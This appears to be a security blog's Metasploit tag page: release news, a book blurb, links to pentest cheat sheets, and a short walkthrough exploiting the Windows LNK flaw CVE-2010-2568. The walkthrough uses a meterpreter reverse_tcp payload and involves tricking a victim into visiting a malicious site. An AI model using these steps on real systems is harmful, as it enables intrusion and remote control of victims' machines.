Posts tagged metasploit

 

BackTrack 5 R1 released


The BackTrack team has released an updated version of BackTrack 5 with a lot of new tools and updates. For more information, check out the links below.

http://www.backtrack-linux.org/backtrack/backtrack-5-r1-released/

http://www.backtrack-linux.org/downloads/

 

Metasploit: A Penetration Tester’s Guide Book Coming Soon


Metasploit: A Penetration Tester’s Guide will teach you how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts

http://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X


Exploiting Windows LNK vulnerability (CVE-2010-2568)


A new 0-day exploit was recently detected that takes advantage of Windows incorrectly parsing shortcuts, so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. This can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV. Metasploit recently pushed the exploit as an msf module. There is still no patch released for this vulnerability.

There are 2 ways to exploit this:

1) Keep the 2 files, the LNK file and the DLL, on the USB stick and run it on the victim machine
2) Or trick the victim into accessing the malicious site

We will use the 2nd method:

1) svn update (update your msf)
2) use windows/browser/ms10_xxx_windows_shell_lnk_execute
3) set payload windows/meterpreter/reverse_tcp
4) set LHOST 192.168.0.103 (your IP)
5) set LPORT 1427 (any port)
6) exploit

Check out my video demonstrating the above method: Exploiting Windows LNK vulnerability (CVE-2010-2568)

Metasploit Framework 3.4.1 Released


The Metasploit Project is proud to announce the release of the Metasploit Framework version 3.4.1. As always, you can get it from our downloads page,

Security Assessment and Pentest tools Cheat Sheets


Found these in my old bookmarks. Below are some useful cheat sheets; let me know if you have found any other cheat sheets and I will update the post.

Nmap
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

Nessus
http://www.secguru.com/link/nessus_nmap_scanning_cheatsheet
Backtrack 4
http://www.corelan.be:8800/index.php/2009/07/04/backtrack-4-cheat-sheet/
Misc tools
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf
Metasploit Meterpreter
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
http://www.rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html


Oracle Security
http://www.red-database-security.com/wp/oracle_cheat.pdf
XSS
http://ha.ckers.org/xss.html
http://openmya.hacker.jp/hasegawa/security/utf7cs.html
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

SQL Injection
http://ha.ckers.org/sqlinjection/
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

Microsoft SQL, Sybase, MySQL, Oracle, PostgreSQL, DB2, Ingres, Bypass SQL Injection Filters
http://michaeldaw.org/sql-injection-cheat-sheet
http://pentestmonkey.net/cheat-sheets/
Packetlife Cheatsheets

http://packetlife.net/cheatsheets/

Ed Skoudis’ Pentest Cheatsheets

Windows commandline tools
http://www.sans.org/resources/sec560/windows_command_line_sheet_v1.pdf
Netcat Cheat Sheet
http://www.sans.org/resources/sec560/netcat_cheat_sheet_v1.pdf
Useful Attack Tools, Metasploit commands, HPing, FGDump
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf

Reverse Engineering Malware Cheat Sheet

http://zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html

Security Architecture Cheat Sheet for Internet Applications

http://zeltser.com/security-management/security-architecture-cheat-sheet.html

CEH cheatsheets from Mindcert

http://www.mindcert.com/resources/MindCert_Nmap_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Enumeration_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Ethical_Hacking_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Footprinting_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Scanning_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_System_Hacking_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Trojans_MindMap.pdf

http://www.mindcert.com/resources/CCNA_Cisco_IP_Routing.pdf

Metasploit MeterpreterClient wiki


Detailed Metasploit Meterpreter core commands

Kudos to bond for sharing this link

http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient

Exploitation Videos from Dino Dai Zovi


Found interesting videos on exploitation

Dino Dai Zovi’s Memory Corruption 101

Basic debugging for exploit development

http://vimeo.com/5113617

Exploitation 102

Exploit mitigations, shellcoding, and Metasploit with Dino Dai Zovi.
